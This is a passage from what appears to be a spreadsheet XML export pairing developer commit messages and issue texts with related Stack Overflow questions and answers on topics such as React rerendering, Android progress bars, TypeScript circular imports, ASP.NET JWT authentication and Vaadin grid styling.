  IntPtr resultPtr = setlocale(category, locale);
  return Marshal.PtrToStringAnsi(resultPtr);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;ol start="2"&gt;
&lt;li&gt;Use it somewhere later:&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code&gt;var ret = SetLocale(0, &amp;quot;de-DE&amp;quot;); // set de-DE
var locale = SetLocale(0, null); // get existing; should return &amp;quot;de-DE&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;First value 0 means LC_ALL.&lt;/p&gt;
&lt;p&gt;The getter returns &amp;quot;C&amp;quot; instead of the &amp;quot;de-DE&amp;quot; set the line before, which means &amp;quot;invariant culture&amp;quot;&lt;/p&gt;
&lt;p&gt;When using null instead of the string value the method should return the existing locale, in our case I'd expect &amp;quot;de-DE&amp;quot;. This get/set scenario works fine in a C++ module with the native method.&lt;/p&gt;
&lt;p&gt;What I tried so far:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;with/without MarshalAs, CharSet Auto/Ansi&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;the unicode version (_wsetlocale)&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;calling directly the &amp;quot;pinvoked&amp;quot; setlocale without the SetLocale helper and its PtrToStringAnsi&lt;/p&gt;
&lt;p&gt;all with same effect&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Any ideas anyone?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C956</t>
  </si>
  <si>
    <t>add uber type services
    - references:
        - http://stackoverflow.com/questions/30626030/can-you-force-a-react-component-to-rerender-without-calling-setstate
        - http://stackoverflow.com/questions/37401635/react-js-wait-for-setstate-to-finish-before-triggering-a-function</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In class components, you can call &lt;code&gt;this.forceUpdate()&lt;/code&gt; to force a rerender.&lt;/p&gt;
&lt;p&gt;Documentation: &lt;a href="https://react.dev/reference/react/Component#forceupdate" rel="nofollow noreferrer"&gt;https://react.dev/reference/react/Component#forceupdate&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;In function components, there's no equivalent of &lt;code&gt;forceUpdate&lt;/code&gt;, but you can &lt;a href="https://stackoverflow.com/a/53837442/200224"&gt;contrive a way to force updates with the &lt;code&gt;useState&lt;/code&gt; hook&lt;/a&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm architecting a .NET "web service" and an iPhone application that will consume these services.  I'm curious if there are any best practices for architecting the protocol for exchanging data between the two.  SOAP-based web services feel too heavy to me for an iPhone app.  Perhaps REST, JSON, POX instead?  Certainly the specifics of the application dictate the protocol to some degree, but I'm curious what others have done.
Ideally, I'd like to leverage WCF if possible (again, perhaps its REST, JSON, or POX support) so that I can keep my options open for creating other bindings for other client applications in the future.
Any advice would be greatly appreciated.
Thanks.
</t>
  </si>
  <si>
    <t>C957</t>
  </si>
  <si>
    <t>Replacing terminal input component made up of editable div with
`textarea`.
Unlike input and textarea elements, editable `div`s do not have
functions letting us know the location of the cursor which is needed to
prevent deleting of the prompt.
Source:
Get cursor position (in characters) within a text Input field: https://stackoverflow.com/questions/2897155/get-cursor-position-in-characters-within-a-text-input-field
Use of selectionStart to get the location of the cursor: https://stackoverflow.com/questions/2897155/get-cursor-position-in-characters-within-a-text-input-field/48150864#48150864</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;Easier update:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Use &lt;code&gt;field.selectionStart&lt;/code&gt; &lt;a href="https://stackoverflow.com/a/48150864/4031815"&gt;example in this answer&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Thanks to @commonSenseCode for pointing this out.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;&lt;strong&gt;Old answer:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Found this solution. Not jquery based but there is no problem to integrate it to jquery:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/*
** Returns the caret (cursor) position of the specified text field (oField).
** Return value range is 0-oField.value.length.
*/
function doGetCaretPosition (oField) {
  // Initialize
  var iCaretPos = 0;
  // IE Support
  if (document.selection) {
    // Set focus on the element
    oField.focus();
    // To get cursor position, get empty selection range
    var oSel = document.selection.createRange();
    // Move selection start to 0 position
    oSel.moveStart('character', -oField.value.length);
    // The caret position is selection length
    iCaretPos = oSel.text.length;
  }
  // Firefox support
  else if (oField.selectionStart || oField.selectionStart == '0')
    iCaretPos = oField.selectionDirection=='backward' ? oField.selectionStart : oField.selectionEnd;
  // Return results
  return iCaretPos;
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are currently migration several &lt;code&gt;@RestControllerEndpoint&lt;/code&gt; to the framework-agnostic &lt;code&gt;@WebEndpoint&lt;/code&gt;. The problem:&lt;/p&gt;
&lt;p&gt;These endpoints trigger an asynchronous task, which the status code should reflect (Accepted).&lt;/p&gt;
&lt;p&gt;Is this possible using &lt;code&gt;@WebEndpoint&lt;/code&gt; and &lt;code&gt;@WriteOperation&lt;/code&gt;? I guess using &lt;code&gt;@ResponseStatus&lt;/code&gt; is not allowed?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C958</t>
  </si>
  <si>
    <t>sidenav: cosmetic changes
- sidenav background
  - REF: https://stackoverflow.com/questions/47679674/remove-box-shadow-from-angular-material-mat-chip/57017948
- sidenav button autofocus
  - REF: angular/components#2879 (comment)
  - REF: https://stackoverflow.com/questions/53741232/angular-material-button-remove-autofocus
  - REF: https://material.angular.io/cdk/a11y/overview
- ng build --prod --output-path ../deploy --base-href /Xstage/chuckbaker/deploy/
- ng build --prod --output-path ../docs --base-href https://shigimcp.github.io/cbakerphoto/
- npx angular-cli-ghpages --dir=../docs/ --message="sidenav: cosmetic changes"</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;To all new readers coming to read this post. Apply this class in your 'mat-chip' element to remove z index. This will remove shadow also.
&lt;div class="snippet" data-lang="js" data-hide="false" data-console="true" data-babel="false"&gt;_x000D_
&lt;div class="snippet-code"&gt;_x000D_
&lt;pre class="snippet-code-html lang-html prettyprint-override"&gt;&lt;code&gt;class="mat-elevation-z0"&lt;/code&gt;&lt;/pre&gt;_x000D_
&lt;/div&gt;_x000D_
&lt;/div&gt;_x000D_
&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm starting on a fresh new project--should I look at my spec and decide which design patterns to apply, or just come up with a general idea of organization and allow the patterns to emerge organically through refactoring?
In your experience, which technique will be most productive and have a greater chance of leading to clean elegant code?
I'm also wondering if there are design patterns out there that aren't defined by the GoF, but could be just as valuable?  If so, what are some useful resources for informing myself about these?
</t>
  </si>
  <si>
    <t>C959</t>
  </si>
  <si>
    <t>Show a determinate progress thing while uploading
There's talk about determinate "circular progress indicators" at [1] (do
your CPU a favor and don't go there), but Android doesn't actually have
them: it "only supports indeterminate mode [...] circular progress
bars". [2]  Also see [3] and [4].
I was just going to have a horizontal bar at the top of my activity
then, but that way madness lies.  See [5], [6], [7], and [8].
In the end I found the [MaterialProgressBar][9] library, which saved my
sanity.  Thank you, @DreaminginCodeZH.
[1]: https://material.io/design/components/progress-indicators.html
[2]: https://developer.android.com/reference/android/widget/ProgressBar.html
[3]: https://stackoverflow.com/q/12776587
     "Android Circular Determinate ProgressBar"
[4]: https://youtu.be/hSfN_aYKkzo
     "Circular Determinate ProgressBar - Android Studio Tutorial"
[5]: https://stackoverflow.com/q/14171471
     "Remove vertical padding from horizontal ProgressBar"
[6]: https://stackoverflow.com/q/18526644
     "Align ProgressBar horizontal to top (remove gap)"
[7]: https://stackoverflow.com/q/51058675
     "Android Progress Bar Removing the default padding"
[8]: https://stackoverflow.com/q/46813669</t>
  </si>
  <si>
    <t>I have written detailed example on Android circular progress bar here on my blog demonuts.com You can also fond full source code and explanation there.
Here's how I made circular progressbar with percentage inside circle in pure code without any library.
first create a drawable file called circular.xml
&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;layer-list xmlns:android="http://schemas.android.com/apk/res/android"&gt;
    &lt;item android:id="@android:id/secondaryProgress"&gt;
        &lt;shape
            android:innerRadiusRatio="6"
            android:shape="ring"
            android:thicknessRatio="20.0"
            android:useLevel="true"&gt;
            &lt;gradient
                android:centerColor="#999999"
                android:endColor="#999999"
                android:startColor="#999999"
                android:type="sweep" /&gt;
        &lt;/shape&gt;
    &lt;/item&gt;
    &lt;item android:id="@android:id/progress"&gt;
        &lt;rotate
            android:fromDegrees="270"
            android:pivotX="50%"
            android:pivotY="50%"
            android:toDegrees="270"&gt;
            &lt;shape
                android:innerRadiusRatio="6"
                android:shape="ring"
                android:thicknessRatio="20.0"
                android:useLevel="true"&gt;
                &lt;rotate
                    android:fromDegrees="0"
                    android:pivotX="50%"
                    android:pivotY="50%"
                    android:toDegrees="360" /&gt;
                &lt;gradient
                    android:centerColor="#00FF00"
                    android:endColor="#00FF00"
                    android:startColor="#00FF00"
                    android:type="sweep" /&gt;
            &lt;/shape&gt;
        &lt;/rotate&gt;
    &lt;/item&gt;
&lt;/layer-list&gt;
Now in your activity_main.xml  add following:
  &lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;RelativeLayout xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:tools="http://schemas.android.com/tools"
    android:layout_width="match_parent"
    android:layout_height="match_parent"
    android:background="@color/dialog"
    tools:context="com.example.parsaniahardik.progressanimation.MainActivity"&gt;
    &lt;ProgressBar
        android:id="@+id/circularProgressbar"
        style="?android:attr/progressBarStyleHorizontal"
        android:layout_width="250dp"
        android:layout_height="250dp"
        android:indeterminate="false"
        android:max="100"
        android:progress="50"
        android:layout_centerInParent="true"
        android:progressDrawable="@drawable/circular"
        android:secondaryProgress="100"
        /&gt;
    &lt;ImageView
        android:layout_width="90dp"
        android:layout_height="90dp"
        android:background="@drawable/whitecircle"
        android:layout_centerInParent="true"/&gt;
    &lt;TextView
        android:id="@+id/tv"
        android:layout_width="250dp"
        android:layout_height="250dp"
        android:gravity="center"
        android:text="25%"
        android:layout_centerInParent="true"
        android:textColor="@color/colorPrimaryDark"
        android:textSize="20sp" /&gt;
&lt;/RelativeLayout&gt;
In activity_main.xml I have used one circular image with white background to show white background around percentage. Here is the image:
You can change color of this image to set custom color around percentage text.
Now finally add following code to MainActivity.java :
import android.content.res.Resources;
import android.graphics.drawable.Drawable;
import android.os.Handler;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.view.animation.DecelerateInterpolator;
import android.widget.ProgressBar;
import android.widget.TextView;
public class MainActivity extends AppCompatActivity {
    int pStatus = 0;
    private Handler handler = new Handler();
    TextView tv;
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        Resources res = getResources();
        Drawable drawable = res.getDrawable(R.drawable.circular);
        final ProgressBar mProgress = (ProgressBar) findViewById(R.id.circularProgressbar);
        mProgress.setProgress(0);   // Main Progress
        mProgress.setSecondaryProgress(100); // Secondary Progress
        mProgress.setMax(100); // Maximum Progress
        mProgress.setProgressDrawable(drawable);
      /*  ObjectAnimator animation = ObjectAnimator.ofInt(mProgress, "progress", 0, 100);
        animation.setDuration(50000);
        animation.setInterpolator(new DecelerateInterpolator());
        animation.start();*/
        tv = (TextView) findViewById(R.id.tv);
        new Thread(new Runnable() {
            @Override
            public void run() {
                // TODO Auto-generated method stub
                while (pStatus &lt; 100) {
                    pStatus += 1;
                    handler.post(new Runnable() {
                        @Override
                        public void run() {
                            // TODO Auto-generated method stub
                            mProgress.setProgress(pStatus);
                            tv.setText(pStatus + "%");
                        }
                    });
                    try {
                        // Sleep for 200 milliseconds.
                        // Just to display the progress slowly
                        Thread.sleep(8); //thread will take approx 1.5 seconds to finish
                    } catch (InterruptedException e) {
                        e.printStackTrace();
                    }
                }
            }
        }).start();
    }
}
If you want to make horizontal progressbar, follow this link, it has many valuable examples with source code:http://www.skholingua.com/android-basic/user-interface/form-widgets/progressbar</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have this query to &lt;code&gt;INSERT&lt;/code&gt; or &lt;code&gt;UPDATE&lt;/code&gt; data in &lt;code&gt;Table_A&lt;/code&gt;, based on conditions.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;MERGE Table_A WITH (HOLDLOCK) AS Target
USING (
    SELECT * FROM tmp_TABLE
) AS Source
ON 
    Target.cID = Source.cID AND
    Target.office = Source.office AND
    Target.result = Source.result AND
    Target.renDate = Source.rendate AND
    (Target.nextDate = Source.nextDate OR (Target.nextDate IS NULL AND Source.nextDate IS NULL))        
    AND Target.Agent = Source.Agent 
WHEN MATCHED    
THEN 
UPDATE SET 
    Target.office = Source.office, 
    Target.result = Source.result, 
    Target.renDate = Source.renDate, 
    Target.nextDate = Source.nextDate,
    Target.Agent = Source.Agent 
WHEN NOT MATCHED THEN INSERT (
    office,
    result,
    renDate,
    nextDate,
    Agent
    ) 
VALUES (
    Source.office,
    Source.result,
    Source.renDate,
    Source.nextDate,
    Source.Agent;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It works as intended, SQL-Server returns&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;(10749 rows affected)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I was wondering how complex would it be to add print counters which tell how many rows were updated and how many inserted.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C96</t>
  </si>
  <si>
    <t>Choose a styles architecture approach (SASS, BEM, CSS Modules ? ) #46
As @franmolmedo mentioned, there is an open area here, we need to discuss and choose which approach to follow when handling styles:
Moving to SASS seems to be a good decisition (we will need to define some common variables, colors etc... discussion and further definition needed here).
BEM: Should we use this "nomenclature", if we jump into CSS Modules maybe not.
CSS Modules: seems to be the cool kid in town, it's worth to use it, can we have drawbacks using this approach?
@red your input is really appreciated here as well.
My two cents: I would choose CSS-Modules.
Component style isolation.
Reuse names for classes.
Less coupling
More configuration
Thanks for the feedback @franmolmedo , the approach could be?
Use CSS Modules-
Use some webpack loader / plugin to emit a single CSS but having the CSS of each modules prefixed with unique identifiers to avoid collision.
Do you agree?
That´s right. We need to update webpack configuration adding a new loader that makes the trick. Besides that, developers don´t have to be worried about naming and collisions because this loader assings an unique identifier to each component and then prepends this identifier to all styles related.
About SASS import duplicate (first let's check if sass-loader in fact generate duplicates or not), it seems that there are workarounds available (node-sass-import-once).
http://stackoverflow.com/questions/36926521/webpack-sass-loader-cannot-dedupe-common-scss-imports
http://stackoverflow.com/questions/36339163/how-to-import-a-global-scss-file-with-webpack-only-once-and-not-in-every-singl</t>
  </si>
  <si>
    <t>Without seeing your Webpack config I can only hazard a guess but it looks like you are trying to import a CSS file from node_modules.
When you want to import CSS from node_modules you may have to use the ~. As sokra himself says in this issue:
css @import is relative to the current directory. For resolving "like a module" you can prefix ~.
So maybe something like @import `~module/my_component.scss`; might do the trick.
Resolving imports this way also solved an issue I had where x.css was required by x.js and imported by y.css when x.css imported some sass variable config. Using resolve.alias in Webpack config I could simply do something like:
// webpack.config.js
resolve: {
  alias: {
    styles: 'src/styles/'
  }
}
And then use the tilde to import:
// y.css
@import `~styles/x.scss
If this works then you needn't remove thenode-sass-import-once and everything should resolve correctly.</t>
  </si>
  <si>
    <t xml:space="preserve">Since I didn't do a good job writing the last question, and most of the answers were good, but not at all in the direction I intended for the question to go in, I deleted it and remade it as this question.
I'm a solo developer on my own projects, generally very small things, but I have a few ideas that might turn into FOSS projects. I believe in documentation (to varying degrees, depending on the specific project and the end user), source control, and project management (including bug tracking, time management, and so on). However, I'm not sure how much of a [external-link] I should be following.
Perhaps just keeping a README, associated design/requirements documents, and in-code comments under source control is sufficient. Or maybe there's an agile process that is suitable for a single developer to follow. Or maybe I should take an old-school waterfall model for each project.
What kinds of processes exist for or can be adopted to a solo developer, if I even need a formal process?
EDIT: I realize that there are tasks that I'm doing to be doing like documentation and source control. However, I'm not sure about the how part of the question. As a solo developer, should I adopt a more agile approach (if so, which "branch" of Agile - XP? Scrum? RAD?) or a more conventional approach (waterfall or spiral?)?
</t>
  </si>
  <si>
    <t>C960</t>
  </si>
  <si>
    <t xml:space="preserve">Provided on TCP client to WebSocket relay in order to work around DNS
 and SSL issues with Netty's default TCP client.
See reactor/reactor-netty#1431 , https://stackoverflow.com/questions/50846671/using-amazon-mq-as-a-broker-relay-for-spring-websockets-stomp , https://stackoverflow.com/questions/53105451/how-to-use-spring-messaging-5-1-to-connect-stompssl-broker </t>
  </si>
  <si>
    <t xml:space="preserve">In my application I have a strong requirement for logging each event for the entity and I was considering using [external-link] pattern, i.e. all domain changes have explicit classes and any change to the domain objects can go only using these event classes. You can then rollback and reapply these changes as you want, just like in source control system.
This would solve many issues for me, but I do no know how to persist event objects to db. I will probably have hundreds of event types, so I have limited options:
build a table for each event type (hundreds of tables? what about references to entities?)
build a huge table for all events (with thousands of columns?)
somehow store a binary representation of event in db (??)
store it in some separate file (??)
Do you have any ideas how this can be done?
</t>
  </si>
  <si>
    <t>C961</t>
  </si>
  <si>
    <t>Work on the refactoring of the services of the firebase database
angular 2 firebase promise
https://stackoverflow.com/questions/36435647/promises-in-angular2-with-firebase
https://stackoverflow.com/questions/41885219/angular-2-firebase-observable-to-promise-doesnt-return-anything
https://stackoverflow.com/questions/40979352/access-this-in-firebase-angular2-promise
searching by key using route.params in angular 2 firebase
https://stackoverflow.com/questions/39952187/query-single-firebase-object-by-key-from-a-service</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm building a chatbot in Dialogflow CX and need to collect a parameter within a page, ensuring the following behavior:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Default Value:&lt;/strong&gt; If the user agrees with the default configuration (e.g., &amp;quot;that's fine&amp;quot;), the parameter should retain its default value: &amp;quot;Option A, Option B, Option C&amp;quot;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Appending User Input:&lt;/strong&gt; If the user adds an option (e.g., &amp;quot;Also add Option D&amp;quot;), the parameter should update accordingly: &amp;quot;Option A, Option B, Option C, Option D&amp;quot;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Unrelated Questions:&lt;/strong&gt; If the user asks something unrelated (e.g., &amp;quot;Whatâ€™s the delivery time?&amp;quot;), it should not overwrite or clear &lt;code&gt;my_parameter&lt;/code&gt;.
Instead, the chatbot should answer the question while keeping ``my_parameter` unchanged.
I attempted using a Fallback Generator, but Iâ€™m not sure how to integrate it into this logic.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Current Setup&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;my_parameter&lt;/code&gt; is set as a sys.any parameter.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Added a route with the condition &lt;code&gt;$session.params.my_parameter != null&lt;/code&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Created a Generator with the following prompt:&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;pre&gt;&lt;code&gt;Context:
Consider the previous conversation: $conversation (USER: &amp;quot;Client&amp;quot;, AGENT: &amp;quot;Agent&amp;quot;) 
Client: $last-user-utterance
Task:
Analyze the conversation and determine the desired configuration. 
Provide only a comma-separated list of the individual items, 
without any additional explanations or comments.
Examples:
- If the user confirms the default configuration:
  Output: &amp;quot;Option A, Option B, Option C&amp;quot;
- If the user wants to add &amp;quot;Option D&amp;quot;:
  Output: &amp;quot;Option A, Option B, Option C, Option D&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This setup works well when the user confirms or appends an option. However, when the user asks an unrelated question, the bot interprets it as confirmation and proceeds to the next page.&lt;/p&gt;
&lt;p&gt;Any insights, best practices, or alternative solutions would be greatly appreciated!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C962</t>
  </si>
  <si>
    <t>Problem Description
We need to find a way to preserve the Subject selection in the search-form and passed to platform component as it will be used to make a selection of relevant links associated to the platform choice
However, we should avoid the user to go back and start selecting again in order to re-order the links based on a different selection - there should be an option to select another subject in the platform details component
User Story / Technical Specs
Possible Solutions
query params?
updating params on the fly?
Warnings and Notes:
It might solve #7.
References:
https://angular.io/guide/router#!#query-parameters
https://stackoverflow.com/questions/39245848/how-to-set-query-parameters-to-url-angular2
https://stackoverflow.com/questions/40288521/how-to-append-update-query-parameters-in-angular2
https://angular-2-training-book.rangle.io/handout/routing/query_params.html
https://stackoverflow.com/questions/43698032/how-to-update-queryparams-in-angular2-without-changing-route</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I found one solution by giving router-link and query-parameters separate, like below: &lt;/p&gt;
&lt;p&gt;&lt;code&gt;&amp;lt;a [routerLink]="['/Questions']" [queryParams]="{id:1234,page:1}"&amp;gt;&amp;lt;/a&amp;gt;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;This is working fine for me.&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm having a difficulty with naming the pattern used commonly by the application I've been working on for a while. Just to set the scene: this is a Java EE application that uses messaging (JMS) a lot, persist data in relational database (JDBC) and relies on global transactions (XA) managed by the application server (JTA).
The pattern I'm talking about can be described as follows:
Start XA transaction using JTA transaction manager
Receive a message from the queue using JMS
Process the message by executing some business logic that may update the database tables (JDBS) and also send some other messages to the queues (JMS). It is important that all the operations are participating within ongoing transaction (unit of work).
At the end optionally send the message back or request forward.
In case of the uncaught exception the ongoing unit-of-work is being rolled back and the original message that triggered the process goes back to the queue for redelivery.
So, the question is how would you name such a pattern? Unfortunately I'm not aware of any good name for such a pattern, but I wouldn't be surprised if the pattern has already been names nicely.
</t>
  </si>
  <si>
    <t>C963</t>
  </si>
  <si>
    <t>fix: circular dependency issue
Remove target es5 from json-api tsconfig, and update imports to use "type" based on answer at
https://stackoverflow.com/a/68380172. This fixes
issue with karma tests where they could not use
default target for workspace (currently es2017) and
had to use es5 which causes deprecated warning in
angular 14. Circular dependency still exists, but this
at least allows test to compile and removes warning.
Look at https://stackoverflow.com/a/61259395 for
possibility of removing circular dependencies.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Another solution that does not use interfaces is to use &lt;a href="https://www.typescriptlang.org/docs/handbook/release-notes/typescript-3-8.html#type-only-imports-and-export" rel="noreferrer"&gt;&lt;strong&gt;type only imports&lt;/strong&gt;&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;user-model.ts&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;import type { Post } from './post-model'
export class User {
  Posts: Post[];
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;post-model.ts&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;import type { User } from './user-model'
export class Post {
  User: User;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;These imports get completely removed upon compilation and serve only for the purpose of type checking - that means you can't use them as a value (you can't do &lt;code&gt;new Post()&lt;/code&gt; with a type-only import for example).&lt;/p&gt;
&lt;p&gt;I think this approach is cleaner and more DRY than the alternative that is creating a separate file with interfaces only for the sake of type checking.&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to assign a variable to a directory only if it exists, else assign a default value.&lt;/p&gt;
&lt;pre class="lang-yaml prettyprint-override"&gt;&lt;code&gt;#java
java_root: &amp;quot;{{ root_dir }}/java&amp;quot;
JAVA_HOME: &amp;quot;{{ java_root }}/jdk-default.version&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If a given newer JDK version is installed (given the directory name), I 'd like to assign the variable &lt;code&gt;JAVA_HOME&lt;/code&gt; to another value.&lt;/p&gt;
&lt;p&gt;In pseudo code&lt;/p&gt;
&lt;pre class="lang-yaml prettyprint-override"&gt;&lt;code&gt;if directory exist &amp;quot;{{ java_root }}/jdk-x.0&amp;quot;
  JAVA_HOME: &amp;quot;{{ java_root }}/jdk-x.0&amp;quot;
else 
  JAVA_HOME: &amp;quot;{{ java_root }}/jdk-default.version&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I read about &lt;a href="https://www.ansiblepilot.com/articles/check-if-a-directory-exists-ansible-module-stat/" rel="nofollow noreferrer"&gt;Ansible module &lt;code&gt;stat&lt;/code&gt;&lt;/a&gt; but I prefer to avoid it. Not sure if the machine has module &lt;code&gt;stat&lt;/code&gt; installed.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C964</t>
  </si>
  <si>
    <t>Adding Jwt packages
I don't want to use Identity because Identity tables won't count to the
table count in my project requirements.
That means, i'll lose my Users table as countable table and i'll have
to figure out more tables.
See:
https://stackoverflow.com/questions/48120508/net-core-external-authentication-without-asp-net-identity
https://stackoverflow.com/questions/34905754/using-bearer-jwt-authorization-without-identity
https://stackoverflow.com/questions/18677837/decoding-and-verifying-jwt-token-using-system-identitymodel-tokens-jwt#18882252</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;To solve the:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;No IAuthenticationSignInHandler is configured to handle sign in for
  the scheme: Bearer&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I had to add a cookie handler that will temporarily store the outcome of the external authentication, e.g. the claims that got sent by the external provider. This is necessary since there are typically a couple of redirects involved until you are done with the external authentication process.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Startup&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;services.AddAuthentication(JwtBearerDefaults.AuthenticationScheme).AddJwtBearer(o =&amp;gt;
{
    o.TokenValidationParameters = tokenValidationParameters;
})
.AddCookie()
.AddGoogle(googleOptions =&amp;gt;
{
    googleOptions.SignInScheme = CookieAuthenticationDefaults.AuthenticationScheme;
    googleOptions.ClientId = "x";//Configuration["Authentication:Google:ClientId"];
    googleOptions.ClientSecret = "x";//Configuration["Authentication:Google:ClientSecret"];
    //googleOptions.CallbackPath = "/api/authentication/externalauthentication/signin-google";
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The important part here is CookieAuthenticationDefaults.AuthenticationScheme. This is a string constant that stores "Cookies". While we can directly use the string "Cookies" within our code, using the preset constant would be safer. This is the authentication scheme name given to the &lt;code&gt;AddCookies&lt;/code&gt; function by default. It helps you reference the cookies authentication. &lt;/p&gt;
&lt;p&gt;Now it's time to retrieve the user information from the claims provided by the external authentication in the callback action.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Controller&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[AllowAnonymous]
[HttpPost(nameof(ExternalLogin))]
public IActionResult ExternalLogin(ExternalLoginModel model)
{
    if (model == null || !ModelState.IsValid)
    {
        return null;
    }
    var properties = new AuthenticationProperties { RedirectUri = _authenticationAppSettings.External.RedirectUri };
    return Challenge(properties, model.Provider);
}
[AllowAnonymous]
[HttpGet(nameof(ExternalLoginCallback))]
public async Task&amp;lt;IActionResult&amp;gt; ExternalLoginCallback(string returnUrl = null, string remoteError = null)
{
    //Here we can retrieve the claims
    var result = await HttpContext.AuthenticateAsync(CookieAuthenticationDefaults.AuthenticationScheme);
    return null;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;VoilÃ ! We now have some user information to work with!&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/HGNBZ.png" rel="noreferrer"&gt;&lt;img src="https://i.sstatic.net/HGNBZ.png" alt="enter image description here"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Helpful link&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="http://docs.identityserver.io/en/latest/topics/signin_external_providers.html" rel="noreferrer"&gt;http://docs.identityserver.io/en/latest/topics/signin_external_providers.html&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">We are currently looking at either using CAB or MEF for our next application.  I didn't see any examples on codeplex of how event brokering is handled for sibling control communication, maybe I missed it.  How does inter-control communication work in MEF?  
Also, we are planning on using Infragistics which has provided additional components for the CAB framework.  How well will Infragistics controls integrate into MEF?  
Overall, is MEF worth pursuing for a decently large, 15,000 hours of strictly development, application?
</t>
  </si>
  <si>
    <t>C965</t>
  </si>
  <si>
    <t>Solving heroku deployment issue http://stackoverflow.com/questions/5918582/bash-manage-py-permission-denied</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;You need to make manage.py executable to excecute it. Do &lt;code&gt;chmod +x manage.py&lt;/code&gt; to make it excecutable. Alternately you can do &lt;code&gt;python manage.py &amp;lt;cmd&amp;gt;&lt;/code&gt; instead.&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using Vaadin 23.3.2 and the Grid component. I'm not using Spring-Boot.
I need to apply a CSS style to the cells, while not applying to the header-cells.
I have a number of columns that are dynamic (I can have as few as 5, but can be up to 15 as well).&lt;/p&gt;
&lt;p&gt;I tried using CSS selectors (but I'm unfamiliar with ::part ::slotted and so on, so I may have missed a simple solution).&lt;/p&gt;
&lt;p&gt;I also tried applying a style to the header and using :not, to no avail
I tried this way as well :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  grid_.addColumn(new GridDynamicValueProvider(index))
                        .setTooltipGenerator(row -&amp;gt; row.getValue(index).toString())
                        .setClassNameGenerator(line -&amp;gt; &amp;quot;grid-cell-collapse&amp;quot;)
                        .setHeader(headerSpan).setFlexGrow(1).setSortable(true);
